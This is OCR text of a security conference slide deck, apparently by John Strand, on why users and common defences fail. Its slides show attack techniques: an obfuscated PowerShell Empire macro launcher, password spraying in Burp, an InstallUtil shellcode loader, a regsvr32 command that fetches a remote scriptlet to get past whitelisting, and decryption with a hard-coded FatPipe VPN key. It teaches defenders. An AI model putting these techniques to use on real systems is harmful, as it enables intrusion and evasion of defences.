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Users... They Click things 


Granny Max 


Loves to gamble 
Likes Polka Dots 
Likes anything with 
"Polka" in it 
Thinks the CD tray is a 
coaster 
Collects Gnomes 
Bypasses your outbound 
web filters buy using a 
third party anonymizing 
proxy 


Phil... From Accounting 


Works with numbers.. 
. and Terabytes of 


Cfeereccere P orn | 
| y Has a "slight" 
problem 


Does not get along 
with Granny Max 
Hates cats 
Bypasses your 
filtering by using 
a SSH tunnel 
through his home 
system 


Average" Users 


Do not gamble... 
. at work 
Do not surf porn... 
..dt work 
Likes: Facebook, YouTube, 
Politics, eBay, 
Googling, Fantasy 
football, Fark, Drudge 
Report, the Huffington 
Post, CNN, Amazon 
Dislikes: Web filters 
Quickly becoming friends 
with Phil and Gran Max 
to learn ways to bypass 
your filtering 


The Bad Guys 


Motivated 
Can you imagine 
their HR 
department? 
Wicked skilled (more 
on this Later) 
They either own or 
infect many of the 
sites your more 
"interesting" users 
are going to 


The Bobs 


The Cloud 


The Internet is big.. 
. really big 
You just won't believe 
how vastly hugely 
mindboggingly big it 
is... 
Most of it is 
worthless.. and Evil! 
Many of your users will 
not stop clicking 
until they visit 
every site 


How do bad things happen? 


We seem to be in a loop 
A very bad loop 


Getting angry at questions... 
Best AV? 
Best DLP? 


Best Threat Intel Feed? 
Best Firewall? 


Patterns and Chiasms This 


. Without the lear 


CO 


EXPERIMENT. 


FAIL. 
LEARN. 
REPEAT. 


Password example 


А 


Most password complexity requirements 
are: 
>8 Characters 


Upper/Lower/Alpha/Num 
No Dictionary words 
Full of fail 


b 


compliance!” Truth 1 


“Че cannot fix this because of 


` АА ш 
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NIST Greenbook 


or 6 months and 12 months. 
of guessing th 
possible with 


12 nasswordsz 
г passwordas 


The 12-month value is 


MAXIMUM 
LIFETIME 


Ч 


(months ) 


(rounded 


(rounded rom 8.94) (rounded down from 
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Cash Cow Tipping.... 


THEY TIPPED US IN OUR SLEEP 
» "У №. Т | АУ» | 


Bypass everything.. 
AV, DLP, Firewalls, etc. 
Trivial to do.. 
More smoke and mirrors 


Get previous sessions here: 
Tinyurl.com/504-extra 
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It Wont Get Better 


Mail Providers Blocking Powershell Macros 


Dear GMX Member, 


A virus was detected in a mail addressed to you: 


To prevent further damage, the concerned e-mail has been deleted. 


Cannot send message using the server Gmail 


Sending the message content to the server failed. 


The server response was: This message was blocked because its 
content presents a potentialsecurity issue. Please visithttps:// 
support.google.com/mail/answer/6590 to review our messagecontent 
and attachment content guidelines. u202sm12936179qka.10 - gsmtp 
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"Obfuscate" Empire Macro 


Appear to just look for "powershell" in macro 


Ээ It:sfalvirus!! 


"powershe Ll. ехе -NoP -NonI -W Hidden -Enc JAB3AEMAP" 
Str + "QBOAEUAVwAtAE8AQgBKAEUAYwBOACAAUWBSAFMAdABFAEOALgB" 
Str + "OAEUAdAAuAFCAZQBCAEMAbABJAGUAbgBUADSAJAB1AD0A JwBNA" 


| (БӨ Ёс 


Str + "l.exe -NoP -NonI -W Hidden -Enc JAB3AEMAP" 
Str + "QBOAEUAVwAtAE8AQgBKAEUAYwBOACAAUWB5AFMAdABFAEOALgB"' 
Str + "OAEUAdAAUAFCAZQBCAEMAbABJAGUAbgBUADSAJAB1AD0A JwBNA" 


Do you run any of these? 


/:38.0) Gecko/ 


Accept -Langt en-U 
Accept-Encoding: gzip 

Referer: 

Cookie: Isa 

Connection: close 

p ent-Type: application/x-www-form-urlencoded 
Content-Length: 162 


curl-&flags-O&forcedownlewel &torndi yt rus Jl-O&userna le-target org\ Sempabess )assword-Testingl23&SubmitCre ј<=| од+Оп 


Redirections 


These settings control how Burp handles redirections when performing attacks. 


Follow redirections: © Never 
(9 On-site only 
In-scope only 
Always 


(7) Process cookies in redirections 


Payload Options [Simple list] 


This payload type lets you configure a simple list of strings tk 


Paste Winter15 A 
— | Winter16 ™ 
loadsa) | Ба!2015 


January2016 
January16 
December2015 
Password123 
Winter123 
Winter2015 
Winter 20156 


Remove 


Clear 


Request Payload Redir. Timeout Lengt Comment 


6857 1630 
15062 : 
76 


222 
222 


UserlD's 
Successful Login 


4-7 Failed Login 


Response 1 Response 3 | Request 4 | Response 4 | Request 5 | Respon 


InstallUtil-ShellCode.cs 


e @subTee (Casey Smith) is awesome 
* Please, take a moment and follow 
* By pulling down InstallUtil-ShellCode.cs and 
inserting msvenom (-f csharp) into it 
* Compile with the csc.exe tooL 
* Awesome! Because it does not need a full Visual 
Studio Environment 
* Walkthrough here: 
° http://www.blackhillsinfosec.com/?p-24881 
• @subTee here: 
° http://subt0x10.blogspot.com/?m=1 


InstallUtil.exe /logfile= /LogToConsole-false /U exeshell.exe 


ss Program 


Console.WriteLine( J; 
//Add any behaviour here to throw off sandbox execution/analysts :) 


[Sys stem. d ZU SLAP UE HI 


s Sample : Sy | InstalljEunction 


//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. 
i erride void Uninstall(System.Collections.IDictionary savedState) 


Shellcode.Exec(); 


«?XML versi 1.0"?» 
<scriptlet> 
<registration 
progid="PoC" 
classid="{F0001111 -0000 - 0000 - 9000 -0000FEEDACDC ) " 
<!-- Proof Of Concept - Casey Smith @subTee --> 
<!-- License: BSD3-Clause --> 


<script language-"JScript"» 
<! [CDATA[ 


var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); 


regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll 


Yea.  regsvr32 can take a url 

It is Proxy aware 

Uses TLS 

Is a signed MS binary.. 
http://subtOx10.blogspot.com/2016/04/bypass- 
application-whitelisting-script.html?m-1 


Moving forward 


AV, DLP, Firewalls, Threat Intelligence Feeds, 
Cyber Kill-Chain 


Lets leave those old things behind 


If we started all over again. How would we do 
it? 


There is a lot of baggage over the years... 
Time to let that go too. 


This is all based on our testing and training 
Same loops, same patterns 


Attacking a VPN 


FatPipe / 
e Found by Joff Thyer РАТ Горе 


ө They have not 
responded in months... 


LDAP Authenticati... 


e Problem with key reuse 


e |f the same key is used... 
For all installations 


ө | can steal that key 


• And decrypt on the fly 
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Bruce Cries... 


public void firstTimeRead(int paramInt) 


[paramInt] ! 


[paramInt] = false; 
ы 


byte[] arrayOfBytel = new byte[ ІК 
this. .read(arrayOfByte1, 0, arrayOfByte1.length); 


P (i le -1) { 
byte[] arrayOfByte2 = new byte[i]; 
System.arraycopy(arrayOfByte1, 0, arrayOfByte2, 8, i); 
= Twofish Algorithm. такеКеу( „де Вуке5()); 
byte[] arrayOfByte3 = CRYPT.getDecryptedBytes(arrayOfByte2, ); 


byte[] arrayOfByte4 - new byte[16]; 
System.arraycopy(arrayOfByte3, 0, arrayOfByte4, 
this. [0] = new String(arrayOfByte4) ; 

= Twofish Algorithm. makeKey(this. [0].getBytes()); 


catch (Exception localException) í 
localException.printStackTrace(); 
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ALL BLOCKS 
RAE EQUAL 
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Quick!! To Python! 


struct 
twofish Twofish 


static key - '816D5BD0FAE35342' 

init key = 'e12fd69b1f0bed397a187a1c1953f552'.decode( ' ћех') 
'3ec107c388dc30c851a3d64db4f879dd' . decode( ‘hex' ) 
'f4a9a41e04d37c72be4d3f168944840e' . decode( ' ћех' ) 
'57d52b8806794c48506a95e15b877376' .десоде ( ' hex ' ) 


'72f2aed8c2e14b6769c7 f7da4a9f5d44'.decode( 'hex ' ) 
'143771c314f7079b1f7e9d7c48549d42' .десоде ( ' hex ' ) 
'536fb4cec74c3f332e44b31dc7fc558d'. decode( ' ћех' ) 
'dabf359b9269cbc7a4958897fbc6b635' . десоде ( ' ћех' ) 
'24ab42d42adf2c76a9dcd48f fbaa555e'.decode( ' ћех' ) 
'218b846d334d8e12827eb30a36e2bd6cb' . decode( ' ћех' ) 


= Twofish(static key) 
= tfl.decrypt(init key) 


wofish(tf2.decrypt(sblock1) ) 


T 
Twofish(tf3.decrypt(sblock3)) 


'Client: ' + tf2.decrypt(cblock1) 
'Server: ' + tf2.decrypt(sblock2) 


‘Client: tf3.decrypt(cblock2) 
‘Server: tf3.decrypt(sblock4) 


‘Client: tf4.decrypt(cblock3) >7 % 
'Server: tf4.decrypt(sblock6) 
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Results! ! 


z- ©% Python ./fatpipe decrypt.py 


Client: 0 


Server: 
Client: 
Server: 
Client: 


Server: 


#2|5.2.2r10 


3|aaaa 
#4 
5 | аааа |0 


861010111019 
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• Exploits are not always buffer/heap 
overflows 


e We need to look deeper into the logic of 
things. 


” 
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SDR.. Is Awesome! 


x 
x 
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Frequency (MHz) 


300/315/390 MHz $77 
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But Can Be frustrating.. 
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Stealing your garage door 
opener... 


313.000 
Frequency (MHz) 
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© © Top Block 
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WAV to bin.. 


Partial... 


#!/usr/bin/python 
# This file reads an input file from gnuradio that contains a 


# digital baseband waveform and prints the bits contained in 


its 


# payload. The end of the preamble for each transmission is 


marked 


1 


# by gnuradio with a value of 2 or 3. All other values will be 
or 

# 0. 

import 10 

import sys 


from struct import * 


payloadLength - 92 


waveformFileName = "ook.bin" 


# open input file for read access in binary mode 


waveformFile - io.open(waveformFileName, 'rb') 
# read file contents to a list 

waveformData - list(waveformFile.read()) 

# close the file 


waveformFile.close() 97 % 
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€ Security is moving on 
• Not just OS and Web security 
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Sto 


New Fundamental 


App Locker and SRP 
Long Passwords 

Two Factor Auth 
Firewall Everything 
Internet Whitelisting 
Regularly Test Things 


Assume you will be 


compromised.. Plan 


Accordingly!!!! 
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p me 


THERE'S A POINT WHERE 
THIS NEEDS TO STOP 
AND 
WE'VE 
CLEARLY CROSSED IT 


oN | 
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Lets Practice! 


Administrator: Command Prompt - 504lab-32bit.exe 


C: XTools»504lab-32bit.exe 

4 TCP Backdoor has been started on your host. Without connecting to it id 

entify it and answer the following questions. 

What TCP port is the backdoor listening on? 63864 

What is the process id number of the backdoor? 2708 

What is the Parent process id number of the backdoor? 2280 

Use netcat to connect to the backdoors TCP port. 

What is flag printed when you connect to the backdoor? TheFlagisBlackó68685 

1118 

This powershell backdoor was easy to find because it listened on a TCP por 
Now I'm creating a new powershell process that does not. 

What is the process id number of the backdoor? 


Thanks To Mark Baggett! 
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More! More Practice! 


Internal S= 
ға/уы | — Notes 00000000 


| шанг : cmd.exe access was restricted, could be created 

command line access 8/18/2014 fail . im 

via a shortcut (.Ink file) 

Malware executed with no AV alerts and 

fail resulted in a successful two-way connection 

back to BHIS's server. 

Malware executed with no AV alerts and 
Custom malware - сор Š resulted in a successful two-way connection 
== : 8/18/2014 fail i ande нена 
VSAgent back to BHIS's server. Request Modification 

Required 


Ascii Shell code 


injection malware - 
Metasploit, 8/18/2014 
PyInjector, 

PowerSploit 


AV didn't catch/ Egress filtering prevented she 


malware EXE - 8/18/2014 
Metasploit 


AV didn't catch/ Egress filtering prevented she 


8/18/2014 AV didn't catch/ Egress filtering prevented she 


d ЕГЕ 


Plaintext credit card 
number data 
exfiltration 

C2 detection 


HTTP viewstate 


web application whitelisting prevents 
'traditional' exfiltration methods 


covert channel - /18/2014 ass ter prevented callback communication 
VSAgent 

Reverse TCP port 443 4 
Meterpreter Channe 8/18/2014 ass w ilter prevented callback communication / Š 

- Metasploit Xi 


ју 


Non-standard ТСР 8/18/2014 all portstested except 53 did not allow non- BLACK HILLS 
1 / (4 а>> 4 ы А n 
— channels - Metasploit proxied communication 7 MEN, 
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Want this? 


And other things.... 


http://tinyurl.com/504-extra #77 
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A note on architecture 


Thanks for attending! 


e John Strand "INSTANT ANTIDEPRESSANT. 
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- @strandjs 
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Puppies Make It All Better 
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